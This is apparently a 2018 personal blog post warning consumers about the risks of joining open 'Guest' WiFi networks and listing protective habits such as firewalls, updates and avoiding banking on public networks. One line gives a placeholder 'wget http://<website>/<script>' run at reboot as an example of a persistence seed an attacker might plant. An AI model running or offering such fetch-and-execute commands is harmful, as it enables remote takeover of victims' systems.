Why Never Join a "Guest" or "Free" WiFi Network

February 5, 2018

Joining a "Guest" or "Free" WiFi Network just completely gives me the willies.  It is the digital equivalent of having unprotected sex with multiple partners, simultaneously.

If you do have to, or have in the past, you need to find out how to "Forget" that network. Here is a list of instructions; follow them now.  Come back and read the rest of the article later.

I am not endorsing these sites; I just put them there for ease.  Here is a generic Google Search. Simply replace "<enter your device name here>" with the type of device you have and hit the magnifying glass.

Something you have to recall from my writings long ago for this to make sense is the following matrix for vulnerability assessment summarized here:

  1. Identify a threat
  2. Identify vulnerabilities specific to 1.
  3. Develop counter-measures
  4. Implement them.
  5. Assess that they work against the named threats
  6. Go back to 1.

All systems are vulnerable to some degree and there is no such thing as "Perfect Security."

However, there are key items to be aware of.

Microsoft, Apple, and Linux all have different vulnerabilities that can be exploited.  This article is not an attempt to weed out which one is better.  Frankly, the worst operating system is the one we have between our ears.  We are naive. We either don't know or don't follow best security practices for things as simple as using a medium to strong password that is changed frequently.  Simply put, the biggest vulnerability of all:  Us.

When you join your mobile device to a "Guest" network, you have no control and limited knowledge, at best, of the settings of that network.  If there is a hostile force on that network, you just opened up a vulnerability.  You just matched a 2 to a 1, using the table above.  If you are knowledgeable enough to work through 3-5 on the table, move on to another article.  If not, continue reading.

One of the features of WiFi that makes this work is that once you connect to a network named "Guest," that particular device will automatically try to connect to any other network you come across with the same name.  If it is a password-secured WiFi, then the password needs to match, too.  However, many "Guest" networks are not secured with a password.  They simply have an end-user license agreement to check off before you connect.  This agreement provides all the security of a paper target.

Whether that network is encrypted or not doesn't matter.  When you join and another person is on that network, they can see your traffic.  That traffic analysis information tells them what sites you are going to, and how much data you are exchanging with the remote location.  If that data stream is encrypted, getting additional information is difficult.  However, they just found out that you like banking online, or that you read Kindle books and are shopping, you like looking at porn, etc.  Whatever you do online while you are on a guest network, they can track.

If they are evil enough, they can use readily available tools to find vulnerabilities in your system.  If they find one, they can exploit it to plant a seed on your computer.  This seed can be as small as "wget http://<website>/<script>" set to execute on your reboot.

Then they wait.

And they own your system.

By "owning" a system, I mean they have complete control of your system.  The trick is to not let you know that they are there.  Oh, you might see a security pop-up, or not.  You may see an increased number of perverted advertisements, or not.  You may experience increased system usage, or not.  It all comes down to the talent level of the hacker who owns your system.

At this point, anything your system is used for, encrypted or not, is theirs.

So, how do I protect against this?

  1. Don't connect to "Free WiFi" locations, ever.
  2. If you have to, then connect for the shortest time needed and only with an active firewall.  This will not completely protect you, but it will increase the level of difficulty the attacker must employ to get your information.
  3. Update your system at home, before and after connecting.  This is for both operating system and all additional security software that you have on your system.
  4. Perform a full system scan with your security programs.
  5. NEVER ACCESS FINANCIAL DATA USING A GUEST NETWORK!  Never, means even if you perceive that you must.  Save it for later.  Get a bank-developed app for your smart device and use that.

We, the public, have to up our security game.

The combination of sophisticated bot-networks and recent security breaches of Equifax gives hackers unprecedented access to our connected systems.  Everything from laptops and desktops to smartphones, TVs, security cameras and many others is vulnerable. The collection of non-traditional computer connected devices is often referred to as the IoT -- Internet of Things.

We have to learn how to keep these items updated and secure.  Many have an auto-update feature.  However, if the device is deprived of Internet access, it cannot update itself.  Thus, when you first connect to the Internet, the device is in its most vulnerable state.  Be aware of this and keep them updated.

Using personal information obtained from the Equifax breach, hackers can now employ personal information to craft customized attacks against us.

We are lazy creatures of habit.  We generally use a small pool of usernames and passwords.  Once one account is breached, this habit gives the hacker access to every account you have that uses the same username/password combination. Using this invaluable information in combination with knowing what sites we travel to means they can sit and wait.  Your username/password goes into a list called a "dictionary."  The dictionary allows them to do a targeted attack against a site, waiting for it to become vulnerable, using your known information, in combination with millions of others, to gain more valuable information.  This second- or third-tier information gain is really what they are after, not what books you read on your mobile device.

Always update.  Always perform full system scans on a regular basis (once a week) and whenever you have suspicions.

When in doubt, seek professional help from qualified personnel.  "Qualified" personnel is not your favorite 14-yo.  He/she probably has no liability insurance for the loss or breach of your data.

Thanks for reading,

Jay C. "Jazzy_J" Theriot

email me at j...@jayctheriot.com